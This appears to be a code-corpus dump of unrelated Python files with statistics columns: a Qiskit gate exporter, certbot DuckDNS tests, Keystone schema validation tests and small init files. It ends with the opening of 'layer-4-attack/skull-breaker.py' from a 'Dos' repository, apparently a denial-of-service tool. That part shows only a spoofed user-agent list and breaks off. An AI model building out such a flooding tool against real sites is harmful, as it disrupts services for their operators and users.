out += f"qc.unitary(ctrl_pauli_y_root_dagger, [{control}, {target}], label='ctrl-pauli-y-root-dagger')\n\n"
return out
@staticmethod
def _gate_ctrl_pauli_z_root_dagger(
control, target, controlstate, root, add_comments=True
):
root = f"(2**{root[4:]})" if '^' in root else root[2:]
out = "# ctrl-pauli-z-root-dagger gate\n" if add_comments else ""
if int(controlstate) == 1:
out += f"ctrl_pauli_z_root_dagger = Operator([\n\
[1, 0, 0, 0],\n\
[0, 1, 0, 0],\n\
[0, 0, 1, 0],\n\
[0, 0, 0, np.exp(-1j * np.pi/{root})],\n\
])\n"
else:
out += f"ctrl_pauli_z_root_dagger = Operator([\n\
[1, 0, 0, 0],\n\
[0, 1, 0, 0],\n\
[0, 0, np.exp(-1j * np.pi/{root}), 0],\n\
[0, 0, 0, 1],\n\
])\n"
out += f"qc.unitary(ctrl_pauli_z_root_dagger, [{control}, {target}], label='ctrl-pauli-z-root-dagger')\n\n"
return out
@staticmethod
def _gate_ctrl_sqrt_not(control, target, controlstate, add_comments=True):
out = "# ctrl-sqrt-not gate\n" if add_comments else ""
out += f"qc.csx(qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_rx_theta(
control, target, controlstate, theta_radians, add_comments=True
):
out = "# ctrl-rx-theta gate\n" if add_comments else ""
out += f"qc.crx({theta_radians}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_ry_theta(
control, target, controlstate, theta_radians, add_comments=True
):
out = "# ctrl-ry-theta gate\n" if add_comments else ""
out += f"qc.cry({theta_radians}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_rz_theta(
control, target, controlstate, theta_radians, add_comments=True
):
out = "# ctrl-rz-theta gate\n" if add_comments else ""
out += f"qc.crz({theta_radians}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_s(control, target, controlstate, add_comments=True):
out = "# ctrl-s gate\n" if add_comments else ""
out += f"qc.cp({math.pi/2}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_ctrl_s_dagger(control, target, controlstate, add_comments=True):
out = "# ctrl-s-dagger gate\n" if add_comments else ""
out += f"qc.cp({-math.pi/2}, qr[{control}], qr[{target}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_toffoli(
control, control2, target, controlstate, controlstate2, add_comments=True
):
#controlstate = f"{controlstate}{controlstate2}"
if (int(controlstate) != 1 or int(controlstate2) != 1):
raise BaseExporter.ExportException("Due to a bug in current version of Qiskit, Toffoli gate suports only 1 states as control.")
out = "# toffoli gate\n" if add_comments else ""
out += f"qc.ccx(qr[{control}], qr[{control2}], qr[{target}])\n\n"
return out
@staticmethod
def _gate_fredkin(control, target, target2, controlstate, add_comments=True):
out = "# fredkin gate\n" if add_comments else ""
out += f"qc.cswap(qr[{control}], qr[{target}], qr[{target2}], ctrl_state={controlstate})\n\n"
return out
@staticmethod
def _gate_measure_x(target, classic_bit, add_comments=True):
raise BaseExporter.ExportException("The measure-x gate is not implemented.")
@staticmethod
def _gate_measure_y(target, classic_bit, add_comments=True):
raise BaseExporter.ExportException("The measure-y gate is not implemented.")
@staticmethod
def _gate_measure_z(target, classic_bit, add_comments=True):
out = "# measure-z gate\n" if add_comments else ""
out += f"qc.measure(qr[{target}], cr[{classic_bit}])\n\n"
return out
| 41.412758 | 146 | 0.576995 | 3,469 | 22,073 | 3.54079 | 0.049005 | 0.096719 | 0.034194 | 0.061548 | 0.871855 | 0.848327 | 0.820891 | 0.782789 | 0.75576 | 0.699178 | 0 | 0.025454 | 0.223984 | 22,073 | 532 | 147 | 41.490602 | 0.691634 | 0.002129 | 0 | 0.480932 | 0 | 0.133475 | 0.234824 | 0.089398 | 0 | 0 | 0 | 0 | 0 | 1 | 0.120763 | false | 0 | 0.023305 | 0.004237 | 0.262712 | 0.002119 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b92a97b1261d605546ecced5a1461f1819ffdb7d | 28 | py | Python | neurolib/models/awc/__init__.py | ChristophMetzner/neurolib | 912da81fc9dd3a348684ba695f0f4b739e596bad | [
"MIT"
] | 1 | 2021-07-05T10:55:14.000Z | 2021-07-05T10:55:14.000Z | neurolib/models/awc/__init__.py | ChristophMetzner/neurolib | 912da81fc9dd3a348684ba695f0f4b739e596bad | [
"MIT"
] | null | null | null | neurolib/models/awc/__init__.py | ChristophMetzner/neurolib | 912da81fc9dd3a348684ba695f0f4b739e596bad | [
"MIT"
] | null | null | null | from .model import AWCModel
| 14 | 27 | 0.821429 | 4 | 28 | 5.75 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.142857 | 28 | 1 | 28 | 28 | 0.958333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b94e8b42f4a3901be1deeede1750a768acf29058 | 5,451 | py | Python | tests/cert_test.py | durnezj/certbot_dns_duckdns | 34822ec5838af9886b433fa33d85b3fe191836fc | [
"MIT"
] | null | null | null | tests/cert_test.py | durnezj/certbot_dns_duckdns | 34822ec5838af9886b433fa33d85b3fe191836fc | [
"MIT"
] | null | null | null | tests/cert_test.py | durnezj/certbot_dns_duckdns | 34822ec5838af9886b433fa33d85b3fe191836fc | [
"MIT"
] | null | null | null | """
ATTENTION:
These tests are not meant for the normal test case,
as this tries to test the integration to the Certbot by using
a subprocess call and installing this package globally.
You should not run this test unless you know exactly what you are doing.
"""
import os
import subprocess
import unittest
from certbot.errors import PluginError
from cert.client import Authenticator
DOMAIN = os.environ.get("TEST_DOMAIN")
DUCKDNS_TOKEN = os.environ.get("TEST_DUCKDNS_TOKEN")
class CertbotPluginTests(unittest.TestCase):
def test_invalid_token(self):
assert DOMAIN is not None and len(DOMAIN) > 0
assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0
class TestConfig(object):
test42_token = "securetoken42"
auth = Authenticator(config=TestConfig(), name="test42")
with self.assertRaises(PluginError):
auth._perform(domain=DOMAIN, validation_name="test=42", validation="42")
def test_empty_token(self):
assert DOMAIN is not None and len(DOMAIN) > 0
assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0
class TestConfig(object):
test42_token = ""
auth = Authenticator(config=TestConfig(), name="test42")
with self.assertRaises(PluginError):
auth._perform(domain=DOMAIN, validation_name="test=42", validation="42")
def test_none_token(self):
assert DOMAIN is not None and len(DOMAIN) > 0
assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0
class TestConfig(object):
test42_token = None
auth = Authenticator(config=TestConfig(), name="test42")
with self.assertRaises(PluginError):
auth._perform(domain=DOMAIN, validation_name="test=42", validation="42")
def test_invalid_domain(self):
assert DOMAIN is not None and len(DOMAIN) > 0
assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0
class TestConfig(object):
test42_token = DUCKDNS_TOKEN
auth = Authenticator(config=TestConfig(), name="test42")
with self.assertRaises(PluginError):
auth._perform(domain="thisdomainsisnotvalid", validation_name="test=42", validation="42")
def test_certificate(self):
assert DOMAIN is not None and len(DOMAIN) > 0
assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0
# check if certbot is installed
subprocess.check_output(["certbot", "--version"])
# install certbot_dns_duckdns plugin
subprocess.check_output(["pip", "install", ".."])
# check if certbot works properly with the dns plugin
subprocess.check_output(["certbot",
"certonly",
"--non-interactive",
"--agree-tos",
"--register-unsafely-without-email",
"--authenticator",
"dns-duckdns",
"--dns-duckdns-token",
DUCKDNS_TOKEN,
"--dns-duckdns-propagation-seconds",
"60",
"--dry-run",
"-d",
DOMAIN,
# change the output dirs to allow running test without root permission
"--work-dir",
"test_certbot/config",
"--config-dir",
"test_certbot/config",
"--logs-dir",
"test_certbot/logs"])
def test_wildcard_certificate(self):
assert DOMAIN is not None and len(DOMAIN) > 0 and DOMAIN[0] not in [".", "*"]
assert DUCKDNS_TOKEN is not None and len(DUCKDNS_TOKEN) > 0
wildcard_domain = "*.{}".format(DOMAIN)
# check if certbot is installed
subprocess.check_output(["certbot", "--version"])
# install certbot_dns_duckdns plugin
subprocess.check_output(["pip", "install", ".."])
# check if certbot works properly with the dns plugin
subprocess.check_output(["certbot",
"certonly",
"--non-interactive",
"--agree-tos",
"--register-unsafely-without-email",
"--authenticator",
"dns-duckdns",
"--dns-duckdns-token",
DUCKDNS_TOKEN,
"--dns-duckdns-propagation-seconds",
"60",
"--dry-run",
"-d",
wildcard_domain,
# change the output dirs to allow running test without root permission
"--work-dir",
"test_certbot/config",
"--config-dir",
"test_certbot/config",
"--logs-dir",
"test_certbot/logs"])
if __name__ == "__main__":
unittest.main()
| 40.679104 | 103 | 0.515502 | 517 | 5,451 | 5.303675 | 0.216634 | 0.083151 | 0.039387 | 0.052516 | 0.787017 | 0.787017 | 0.787017 | 0.787017 | 0.772794 | 0.772794 | 0 | 0.015394 | 0.392222 | 5,451 | 133 | 104 | 40.984962 | 0.812255 | 0.115025 | 0 | 0.731183 | 0 | 0 | 0.145768 | 0.031815 | 0 | 0 | 0 | 0 | 0.172043 | 1 | 0.064516 | false | 0 | 0.053763 | 0 | 0.172043 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b97b10dd3d7c21d6787458e7cb1b8391dbb804bb | 186 | py | Python | django/forms/util.py | pomarec/django | 98514849dce07acfaa224a90a784bba9d97249e5 | [
"BSD-3-Clause"
] | 1 | 2015-06-14T07:55:29.000Z | 2015-06-14T07:55:29.000Z | django/forms/util.py | pomarec/django | 98514849dce07acfaa224a90a784bba9d97249e5 | [
"BSD-3-Clause"
] | null | null | null | django/forms/util.py | pomarec/django | 98514849dce07acfaa224a90a784bba9d97249e5 | [
"BSD-3-Clause"
] | null | null | null | import warnings
warnings.warn(
"The django.forms.util module has been renamed. "
"Use django.forms.utils instead.", PendingDeprecationWarning)
from django.forms.utils import *
| 23.25 | 65 | 0.758065 | 23 | 186 | 6.130435 | 0.695652 | 0.234043 | 0.22695 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150538 | 186 | 7 | 66 | 26.571429 | 0.892405 | 0 | 0 | 0 | 0 | 0 | 0.419355 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.4 | 0 | 0.4 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | 6 |
b9dfd1c69dd772cb8aee9d7fb87b2942eeeb0c86 | 15,573 | py | Python | keystone/tests/unit/test_v2_validation.py | andy-ning/stx-keystone | d25ef53d1a152025b78dbf7780b93fe356323836 | [
"Apache-2.0"
] | 1 | 2019-05-08T06:09:35.000Z | 2019-05-08T06:09:35.000Z | keystone/tests/unit/test_v2_validation.py | andy-ning/stx-keystone | d25ef53d1a152025b78dbf7780b93fe356323836 | [
"Apache-2.0"
] | 4 | 2018-08-22T14:51:02.000Z | 2018-10-17T14:04:26.000Z | keystone/tests/unit/test_v2_validation.py | andy-ning/stx-keystone | d25ef53d1a152025b78dbf7780b93fe356323836 | [
"Apache-2.0"
] | 5 | 2018-08-03T17:19:34.000Z | 2019-01-11T15:54:42.000Z | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import uuid
from keystone.assignment import schema as assignment_schema
from keystone.catalog import schema as catalog_schema
from keystone.common.validation import validators
from keystone import exception
from keystone.identity import schema as identity_schema
from keystone.resource import schema as resource_schema
from keystone.tests import unit
_INVALID_NAMES = [True, 24, ' ', '']
_VALID_ENABLED_FORMATS = [True, False]
_INVALID_ENABLED_FORMATS = ['some string', 1, 0, 'True', 'False']
class RoleValidationTestCase(unit.BaseTestCase):
"""Test for V2 Roles API Validation."""
def setUp(self):
super(RoleValidationTestCase, self).setUp()
schema_role_create = assignment_schema.role_create_v2
self.create_validator = validators.SchemaValidator(schema_role_create)
def test_validate_role_create_succeeds(self):
request = {
'name': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_role_create_succeeds_with_spaces_in_description(self):
request = {
'name': uuid.uuid4().hex,
'description': 'Description with spaces'
}
self.create_validator.validate(request)
def test_validate_role_create_succeeds_with_extra_params(self):
request = {
'name': uuid.uuid4().hex,
'asdf': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_role_create_fails_with_invalid_params(self):
request = {
'bogus': uuid.uuid4().hex
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_role_create_fails_with_no_params(self):
request = {}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_role_create_fails_with_invalid_name(self):
"""Exception when validating a create request with invalid `name`."""
for invalid_name in _INVALID_NAMES:
request_to_validate = {'name': invalid_name}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request_to_validate)
class TenantValidationTestCase(unit.BaseTestCase):
"""Test for v2 Tenant API Validation."""
def setUp(self):
super(TenantValidationTestCase, self).setUp()
schema_tenant_create = resource_schema.tenant_create
schema_tenant_update = resource_schema.tenant_update
self.create_validator = validators.SchemaValidator(
schema_tenant_create)
self.update_validator = validators.SchemaValidator(
schema_tenant_update)
def test_validate_tenant_create_success(self):
request = {
'name': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_tenant_create_success_with_empty_description(self):
request = {
'name': uuid.uuid4().hex,
'description': ''
}
self.create_validator.validate(request)
def test_validate_tenant_create_success_with_extra_parameters(self):
request = {
'name': uuid.uuid4().hex,
'description': 'Test tenant',
'enabled': True,
'extra': 'test'
}
self.create_validator.validate(request)
def test_validate_tenant_create_failure_with_missing_name(self):
request = {
'description': 'Test tenant',
'enabled': True
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_tenant_create_fails_with_invalid_name(self):
"""Exception when validating a create request with invalid `name`."""
for invalid_name in _INVALID_NAMES:
request = {'name': invalid_name}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_tenant_create_failure_with_empty_request(self):
request = {}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_tenant_create_failure_with_is_domain(self):
request = {
'name': uuid.uuid4().hex,
'description': 'Test tenant',
'enabled': True,
'is_domain': False
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_tenant_create_with_enabled(self):
"""Validate `enabled` as boolean-like values."""
for valid_enabled in _VALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': valid_enabled
}
self.create_validator.validate(request)
def test_validate_tenant_create_with_invalid_enabled_fails(self):
"""Exception is raised when `enabled` isn't a boolean-like value."""
for invalid_enabled in _INVALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': invalid_enabled
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_tenant_update_success(self):
request = {
'name': uuid.uuid4().hex,
'description': 'Test tenant',
'enabled': True
}
self.update_validator.validate(request)
def test_validate_tenant_update_success_with_optional_ids(self):
request = {
'name': uuid.uuid4().hex,
'description': 'Test tenant',
'enabled': True,
'tenantId': uuid.uuid4().hex,
'id': uuid.uuid4().hex
}
self.update_validator.validate(request)
def test_validate_tenant_update_with_domain_id(self):
request = {
'name': uuid.uuid4().hex,
'domain_id': uuid.uuid4().hex
}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
def test_validate_tenant_update_with_is_domain(self):
request = {
'name': uuid.uuid4().hex,
'is_domain': False
}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
def test_validate_tenant_update_with_empty_request(self):
request = {}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
def test_validate_tenant_update_fails_with_invalid_name(self):
"""Exception when validating an update request with invalid `name`."""
for invalid_name in _INVALID_NAMES:
request = {'name': invalid_name}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
def test_validate_tenant_update_with_enabled(self):
"""Validate `enabled` as boolean-like values."""
for valid_enabled in _VALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': valid_enabled
}
self.update_validator.validate(request)
def test_validate_tenant_update_with_invalid_enabled_fails(self):
"""Exception is raised when `enabled` isn't a boolean-like value."""
for invalid_enabled in _INVALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': invalid_enabled
}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
class ServiceValidationTestCase(unit.BaseTestCase):
"""Test for V2 Service API Validation."""
def setUp(self):
super(ServiceValidationTestCase, self).setUp()
schema_create = catalog_schema.service_create
self.create_validator = validators.SchemaValidator(schema_create)
def test_validate_service_create_succeeds(self):
request = {
'name': uuid.uuid4().hex,
'type': uuid.uuid4().hex,
'description': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_service_create_fails_with_invalid_params(self):
request = {
'bogus': uuid.uuid4().hex
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_service_create_fails_with_invalid_name(self):
for invalid_name in _INVALID_NAMES:
request = {
'type': uuid.uuid4().hex,
'name': invalid_name
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_service_create_with_enabled(self):
"""Validate `enabled` as boolean-like values."""
for valid_enabled in _VALID_ENABLED_FORMATS:
request = {
'type': uuid.uuid4().hex,
'enabled': valid_enabled
}
self.create_validator.validate(request)
def test_validate_service_create_with_invalid_enabled_fails(self):
"""Exception is raised when `enabled` isn't a boolean-like value."""
for invalid_enabled in _INVALID_ENABLED_FORMATS:
request = {
'type': uuid.uuid4().hex,
'enabled': invalid_enabled
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_service_create_with_invalid_type(self):
request = {
'type': -42
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_service_create_with_type_too_large(self):
request = {
'type': 'a' * 256
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
class UserValidationTestCase(unit.BaseTestCase):
"""Test for V2 User API Validation."""
def setUp(self):
super(UserValidationTestCase, self).setUp()
schema_user_create = identity_schema.user_create_v2
schema_user_update = identity_schema.user_update_v2
self.create_validator = validators.SchemaValidator(schema_user_create)
self.update_validator = validators.SchemaValidator(schema_user_update)
def test_validate_user_create_succeeds_with_name(self):
request = {
'name': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_user_create_succeeds_with_username(self):
request = {
'username': uuid.uuid4().hex
}
self.create_validator.validate(request)
def test_validate_user_create_fails_with_invalid_params(self):
request = {
'bogus': uuid.uuid4().hex
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_user_create_fails_with_invalid_name(self):
for invalid_name in _INVALID_NAMES:
request = {
'name': invalid_name
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_user_create_with_enabled(self):
"""Validate `enabled` as boolean-like values."""
for valid_enabled in _VALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': valid_enabled
}
self.create_validator.validate(request)
def test_validate_user_create_with_invalid_enabled_fails(self):
"""Exception is raised when `enabled` isn't a boolean-like value."""
for invalid_enabled in _INVALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': invalid_enabled
}
self.assertRaises(exception.SchemaValidationError,
self.create_validator.validate,
request)
def test_validate_user_update_succeeds_with_name(self):
request = {
'name': uuid.uuid4().hex,
'enabled': True
}
self.update_validator.validate(request)
def test_validate_user_update_succeeds_with_username(self):
request = {
'username': uuid.uuid4().hex,
'enabled': True
}
self.update_validator.validate(request)
def test_validate_user_update_succeeds_with_no_params(self):
request = {}
self.update_validator.validate(request)
def test_validate_user_update_fails_with_invalid_name(self):
for invalid_name in _INVALID_NAMES:
request = {
'name': invalid_name
}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
def test_validate_user_update_with_enabled(self):
"""Validate `enabled` as boolean-like values."""
for valid_enabled in _VALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': valid_enabled
}
self.update_validator.validate(request)
def test_validate_user_update_with_invalid_enabled_fails(self):
"""Exception is raised when `enabled` isn't a boolean-like value."""
for invalid_enabled in _INVALID_ENABLED_FORMATS:
request = {
'name': uuid.uuid4().hex,
'enabled': invalid_enabled
}
self.assertRaises(exception.SchemaValidationError,
self.update_validator.validate,
request)
| 37.078571 | 78 | 0.607654 | 1,509 | 15,573 | 5.977469 | 0.098078 | 0.032594 | 0.069845 | 0.113747 | 0.822727 | 0.803437 | 0.761419 | 0.733925 | 0.706652 | 0.679601 | 0 | 0.005222 | 0.311372 | 15,573 | 419 | 79 | 37.167064 | 0.835882 | 0.088551 | 0 | 0.621951 | 0 | 0 | 0.037168 | 0 | 0 | 0 | 0 | 0 | 0.070122 | 1 | 0.140244 | false | 0 | 0.02439 | 0 | 0.176829 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
b9ecd69c1cc05d601a7789aec44ce9ecd854c77b | 315 | py | Python | dfvfs/credentials/__init__.py | dfjxs/dfvfs | a4154b07bb08c3c86afa2847f3224189dd80c138 | [
"Apache-2.0"
] | 176 | 2015-01-02T13:55:39.000Z | 2022-03-12T11:44:37.000Z | dfvfs/credentials/__init__.py | dfjxs/dfvfs | a4154b07bb08c3c86afa2847f3224189dd80c138 | [
"Apache-2.0"
] | 495 | 2015-01-13T06:47:06.000Z | 2022-03-12T11:07:03.000Z | dfvfs/credentials/__init__.py | dfjxs/dfvfs | a4154b07bb08c3c86afa2847f3224189dd80c138 | [
"Apache-2.0"
] | 62 | 2015-02-23T08:19:38.000Z | 2022-03-18T06:01:22.000Z | # -*- coding: utf-8 -*-
"""Imports for the credential manager."""
from dfvfs.credentials import apfs_credentials
from dfvfs.credentials import bde_credentials
from dfvfs.credentials import encrypted_stream_credentials
from dfvfs.credentials import fvde_credentials
from dfvfs.credentials import luksde_credentials
| 35 | 58 | 0.834921 | 39 | 315 | 6.589744 | 0.461538 | 0.175097 | 0.389105 | 0.505837 | 0.575875 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003521 | 0.098413 | 315 | 8 | 59 | 39.375 | 0.901408 | 0.184127 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
b9f1078cca32ad346b9a2c252c014e22cf0a605c | 20 | py | Python | pc_processor/postproc/__init__.py | MasterHow/PanoLiSeg | 56bd09fe3c85251c46532dba5fcec5fb03951c36 | [
"MIT"
] | 65 | 2021-08-03T02:37:14.000Z | 2022-03-28T17:11:23.000Z | pc_processor/postproc/__init__.py | MasterHow/PanoLiSeg | 56bd09fe3c85251c46532dba5fcec5fb03951c36 | [
"MIT"
] | 12 | 2021-10-30T03:11:00.000Z | 2022-03-27T11:36:11.000Z | pc_processor/postproc/__init__.py | MasterHow/PanoLiSeg | 56bd09fe3c85251c46532dba5fcec5fb03951c36 | [
"MIT"
] | 23 | 2021-10-14T02:44:34.000Z | 2022-03-18T11:45:23.000Z | from .knn import KNN | 20 | 20 | 0.8 | 4 | 20 | 4 | 0.75 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.15 | 20 | 1 | 20 | 20 | 0.941176 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
6a2b98846bf5b6bbb2786252ea7ec1bf9ff293ae | 31,114 | py | Python | layer-4-attack/skull-breaker.py | ChaoSoldier3000/Dos | e87727b94f00ca469fc267043c1f61d307557b7b | [
"Apache-2.0"
] | 2 | 2017-11-20T22:51:02.000Z | 2019-04-29T19:22:44.000Z | layer-4-attack/skull-breaker.py | ChaoSoldier3000/Dos | e87727b94f00ca469fc267043c1f61d307557b7b | [
"Apache-2.0"
] | null | null | null | layer-4-attack/skull-breaker.py | ChaoSoldier3000/Dos | e87727b94f00ca469fc267043c1f61d307557b7b | [
"Apache-2.0"
] | 2 | 2018-05-21T10:27:50.000Z | 2020-08-25T18:13:13.000Z | ua = [
"Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
"Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
"Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
